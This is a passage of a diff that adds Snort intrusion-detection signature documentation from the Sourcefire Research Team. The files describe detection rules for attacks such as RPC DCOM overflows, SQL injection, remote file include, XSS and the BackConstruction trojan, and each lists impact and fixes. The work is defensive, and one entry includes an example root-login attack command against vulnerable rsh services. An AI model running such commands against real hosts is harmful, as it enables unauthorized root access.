+--
+Corrective Action:
+Upgrade to a more current version of IIS.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0874
+
+Bugtraq:
+http://www.securityfocus.com/bid/307
+
+--
--- /dev/null
+++ b/doc/signatures/2506.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2506
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3220.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3220
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1072.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1072
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/640.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 640
+
+--
+Summary: 
+This event is generated when a buffer overflow attack is attempted against a target machine.
+
+--
+Impact: 
+Serious. The attacker may be able to gain remote access to the system or have the ability to execute arbitrary code with the privileges of a system user.
+
+
+-- 
+Detailed Information: 
+This rule tracks the bit combination which may occur in network packets aimed at overflowing IRIX MIPS network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+
+A specific string used during the overflow is application-dependent however, a platform-specific command or code may be present and is detected by this rule.
+
+--
+Attack Scenarios: 
+An attacker launches an overflow exploit against a vulnerable FTP server and gains the ability to start a shell session, thus obtaining interactive access to the target.
+
+--
+Ease of Attack: 
+Simple
+
+
+--
+False Positives: 
+This event may be generated by legitimate traffic to the specified port.
+
+
+-- 
+False Negatives: 
+This event is specific to the shell code defined in the rule.
+Other shell code sequences may not be detected.
+
+--
+Corrective Action: 
+Check the target host for other signs of compromise.
+
+Look for other events concerning the target host.
+
+Apply vendor supplied patches and keep the operating system up to date.
+
+--
+Contributors: 
+Original Rule Writer Unkown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1288.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1288
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion. In particular this rule generates events when the directory
+_vti_bin is accessed. This directory contains sensitive files that may
+be utilized in an attack against the server.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+A user who is using the "discuss" toolbar in Microsoft Internet Explorer
+may inadvertently generate an event from this rule, due to the browser
+making a check for Office Server Extensions. See this URI for more
+details.
+
+ http://www.webmasterworld.com/forum39/2158.htm
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000484.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000484
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Confixx" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "lpath" parameter in the "ftp_index.php" script 
+used by the "Confixx" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Confixx
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000713.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000713
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "roster.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "roster.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/609.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 609
+
+--
+Summary: 
+This event is generated due to the use of a suspicious login attempt
+
+-- 
+Impact: 
+Serious. If successful the attacker may have gained superuser access to the host.
+
+--
+Detailed Information: 
+This rule generates an event when a connection is made using "rsh" whilst passing the parameter "-froot".
+
+A bug in some implementations of the "rsh" daemon software allowed remote root access using the "-froot" parameter for the "rsh command"
+
+--
+Attack Scenarios: 
+If a UNIX machine has the "rsh" service running and is vulnerable to this bug, in can be exploited simply by running the "rsh" command with "-froot" flag. For example, rlogin host.foo.com -l -froot
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+--
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+Disable the "rsh" service if not used, apply a patch if appropriate.
+
+--
+Contributors: 
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0113
+
+Arachnids:
+http://www.whitehats.com/info/IDS387
+
+--
--- /dev/null
+++ b/doc/signatures/100000555.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000555
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "VebiMiau" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "lid" parameter in the "error.php" script used 
+by the "VebiMiau" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using VebiMiau
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/158.txt
@@ -0,0 +1,103 @@
+Rule:
+
+--
+Sid:
+152, 157-158
+
+--
+Summary:
+Backdoor.Backconstruction is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data via download, upload of files, execution of files
+and reboot the targeted machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Backconstruction
+sever to programs normally started on boot. Due to the nature of this
+Trojan it is unlikely that the attacker's client IP address has been
+spoofed.
+
+	SID	Message
+	---	-------
+	152	BackConstruction 2.1 Connection (outgoing TCP
+connection)
+	157	BackConstruction 2.1 Client FTP Open Request (incoming
+TCP connection)
+	158	BackConstruction 2.1 Server FTP Open Reply (outging TCP
+connection)
+
+This Trojan is commonly used to install other Trojan programs.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is located at <drive>:\WINDOWS\Cmctl32.exe
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Shell = "<drive>:\WINDOWS\Cmctl32.exe"
+
+Removal of this entry is required.
+
+Delete the file <drive>:\WINDOWS\Cmctl32.exe
+
+Ending the Trojan process is also necessary. A reboot of the infected
+machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS505
+
+Dark-e:
+http://www.dark-e.com/archive/trojans/backc/21/index.shtml
+
+Pest Patrol:
+www.pestpatrol.com/PestInfo/b/back_construction.asp
+
+--
--- /dev/null
+++ b/doc/signatures/3443.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3443
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2892.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2892
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_nvarchar2
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000648.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000648
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "whos.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "whos.php" script 
+used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000510.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000510
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "rank.php" with SQL commands being passed as the "MemberID" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "MemberID" parameter in the "rank.php" script used by 
+the "VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/898.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+898
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2669.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+2669
+
+-- 
+Summary: 
+This event is generated when an attempt is made to access the file
+ibillpm.pl.
+
+-- 
+Impact: 
+Possible unauthorized administrative access to the victim host.
+Information disclosure.
+
+--
+Detailed Information:
+The script ibillpm.pl is used to process billing and payment via a CGI
+application over the Internet.
+
+The application suffers from a weak default password scheme that could
+be used by an attacker to take control of a user account and view
+billing details.
+
+--
+Affected Systems:
+	iBill Internet Billing Company Processing Plus
+
+--
+Attack Scenarios: 
+An attacker can supply the username and default password for a user to
+the script to gain control.
+
+-- 
+Ease of Attack: 
+Simple
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Uninstall the script ibillpm.pl
+
+Only allow usage from authenticated users
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2554.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2554
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1083.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1083
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000820.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+100000820
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "SaPHPLesson" application running on a webserver. Access to the file "add.php" with SQL commands being passed as the "forumid" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "forumid" parameter in the "add.php" script used by the "SaPHPLesson" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SaPHPLesson
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1353.txt
@@ -0,0 +1,46 @@
+Rule:
+
+--
+Sid:
+1353
+
+--
+Summary:
+Attempted nasm command access via web. 
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a program source on a host. NASM is the Netwide Assembler which is capable of compiling a variety of sources on a variety of platforms into executable binary files. The attacker could possibly compile a program needed for other attacks on the system or install a binary program of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/nasm'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine. Whenever possible, sensitive files and certain areas of the filesystem should have the system immutable flag set to prevent files from being added to the host. On BSD derived systems, setting the systems runtime securelevel also prevents the securelevel from being changed. (note: the securelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2780.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2780
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
